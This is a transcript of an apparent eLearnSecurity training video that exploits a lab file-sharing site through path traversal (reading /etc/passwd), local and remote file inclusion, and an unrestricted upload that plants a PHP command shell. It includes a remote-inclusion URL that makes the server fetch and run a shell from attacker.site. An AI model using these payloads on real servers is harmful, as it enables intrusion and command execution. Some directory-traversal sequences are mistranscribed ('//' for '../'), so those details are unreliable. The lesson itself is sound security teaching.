Welcome to this eLearn Security video training lesson. Today, we are going to see some lesser-known vulnerabilities affecting web applications that are still very dangerous. We will see how to find and exploit vulnerabilities such as unrestricted file upload, path traversal, and remote or local file inclusion. Let's fire up our target web application hosted on fileshare.site. This simple web application allows registered users to upload and share files with others. Some web applications need to access resources on the system. When the resource path on the file system is specified via user-controlled parameter, and if this parameter is not properly sanitized or filtered, the security of the web app itself may be compromised. Let us then navigate the application in order to find a possible injection point to exploit. We already have an account on the web application, so let us just click on Login and use the attacker credentials to access our account page. Now that we are logged in, we can see a few forms in the web page that can be used to upload files on the system. Let us try to upload a simple TXT file and see how the application works. So let us click on Browse here. Select the file name test.txt, confirm, and click Upload New File. Great. Our file has been successfully uploaded. It seems that the application adds a number at the beginning of the file name just uploaded. This may be some kind of mechanism to avoid files with the same names from being uploaded. For now, let us continue our investigation and click on the Open link here. We are redirected to the page files.php, and here we can see the content of the file. Moreover, note that in the address bar, we have a parameter named file, which seems to point to our file. This is going to be the first injection point of your tests, and we want to verify if this parameter is vulnerable to the path traversal. If the web application does not sanitize the parameter correctly, an attacker could gain access to arbitrary files on the server. The easiest way to test it is by changing its value in order to point to a well-known resource on the target web application or system. Note that depending on the server operating system, the root folder can be located using different syntax. While in Unix, the root folder can be found with a simple / character. In Windows, it usually is C:\\. Moreover, the directory separator for Unix is /, while in Windows, we can use both / and \/. We already know that the OS running on the machine is Linux, so we can try to change the value in order to point to the passwd file. What we are going to do now is use a payload that will move up one or more directories level from where we are. We will keep repeating this until we reach the root folder. Once we are in the root folder, we can search for files with a well-known path on the remote file system, in our case, etc/passwd. In order to move up one directory level, we can use the // character sequence. At this time, we don't know where we are in the file system, so we can't be sure how many folders we have to go back to reach the root. As we are going to see, sometimes we don't even need to guess at it. If the application prints out errors, we can discover the current location by using malformed payloads. These errors can give us very useful information. Let's try to insert the name of a file that we know for sure does not exist. For example, we can use a name with a fake extension like this. As we can see, the web application returns a warning. This is very valuable information. Indeed, at the end of the warning, we can see the current path on the remote system. With this simple trick, we are now aware of the full path of the web application. It is more important to note that this information is not always required. So let's suppose we don't know the current document root location. What we have to do is to guess how many // sequences we must use in order to reach the root. Remember that once we reach the root folder, the operating system will simply ignore any further // sequence. So the plan is to use enough // sequences until we reach the root directory. Once we are in the root folder, we can use known file paths such as etc/passwd or boot.ini, depending on the target operating system. In this case, let's use etc/passwd and see if it will be included in the page. The file exists, and we are able to read its content. This confirms that the vulnerability exists and is exploitable. Note that in this payload, we have used many .. sequences, while the root folder is located just 4 folders above the current one. As we stated before, the operating system will ignore all of the extra sequences. Indeed, if we add a few more of the .. sequences in the URL, we are still able to read the passwd file. With this in mind, an attacker can try to read many other sensible files from the remote host. For example, let's try to read the networks file in the etc folder. Once again, the file exists and is loaded in the page. So we can confirm that the file parameter is vulnerable to path traversal. But as you can imagine, the application is also vulnerable to local file inclusion. File inclusion vulnerabilities are divided in 2 categories, local and remote, according to where the file to include is located. In the previous example, we have successfully exploited a local file inclusion. Indeed, we were able to include a file stored on the server. What we can do now is to edit the parameter value with the address of a resource that is obtained from a remote location. Let's try editing the value of the parameter with the address http://www.google.com. If the server successfully includes this URL, we should see the Google homepage within the target web application. So let's submit the request and see what happens. As we can see, the page has been successfully included, meaning that the parameter is vulnerable to remote file inclusion. With this vulnerability, an attacker could edit the payload in order to include a shell on the target server. For example, let's suppose that we have a web application located at the attacker.site, and that we also have a shells folder which contains a shell named shell.txt. Before exploiting the RFI, let us see the content of the shell.txt file hosted in our web application. The code within shell.txt is very simple. It executes 2 commands and prints the results. In this case, pwd displays the current working directory. So in order to test this on the web application, we need to edit the parameter value as follows: http://attacker.site/shells/shell.txt. If everything works, the web server should include our shell and run its code. As we can see, the command has been executed and the content of the web application is listed here. This is just a simple script, but as you can imagine, we can include shell with many other features and get full access to the remote web server. An important thing to note in the shell just used is the extension. Although it contains PHP code, the file extension is .txt. We cannot use .php files when we include them to exploit remote file inclusion. Otherwise, the code within the file will be executed on the attacker server instead of the victim. To demonstrate this, let us include the same file with the .php extension. As we can see in the output, we are now listing the files and the folders on attacker.site. This happens because the attacker server has to parse and execute the content of the file. Keep this in mind, otherwise you will exploit your own server. Now that we know how path traversal, remote and local file inclusion works, let's focus on another vulnerability named unrestricted file upload. The vulnerability affects all those web applications that allows files to be uploaded without properly enforcing restrictive policies such as the file extension, its size, or its actual type. To test this vulnerability, let us go back into the account page and check the other form on the left. This form allows us to upload an avatar for our account. If the web application does not perform security checks on the file type uploaded, a malicious user may be able to upload a shell and execute it. Indeed, once the upload is successful, the attacker can simply trigger it by browsing the uploaded file. This, of course, is if the path of the file name is predictable or known. In order for the application to be vulnerable, the following conditions must be true. The file type is not checked against a whitelist of allowed formats. The file name and path of the uploaded file is known to the attacker or guessable. The folder in which the file is placed allows the execution of server-side scripts. We can start our tests. Let us inspect the source code of the image in order to check the path where the file is stored. Here it is. The image is in the folder avatars. Let's double check it by copying the path directly to the URL. Now that we know where the file is stored, we have to test which file types are allowed by the web app. This time, we're going to upload a different file format such as a .php file. If we inspect this file, we can see that it accepts values using the cmd parameter and then executes the command. So, if the upload works, we could be able to load the shell from our browser and type in the command to run on the server. Let's go back in the web application and try to upload this new shell. From what we see, it seems that the web app doesn't have any control on the file extension. Indeed, if we check the source code once again, we can see that it tries to load the file just uploaded. Let us check if this file is on the web application by typing the path to our shell in the URL bar. Remember that we have to specify the cmd parameter with the command we want to execute on the web application. For example, let's use ls. If the command works, we should see a list of files and folders on the server. Here's the result of the command. The shell works fine, meaning that the web app is vulnerable to unrestricted file upload. From here, we can run almost any command by including it as a value of the cmd parameter. As we have seen during this video, a web application that does not implement proper sanitization and restriction on parameter and extension may be vulnerable to very dangerous attacks. And this concludes our lesson. Thanks very much for joining us.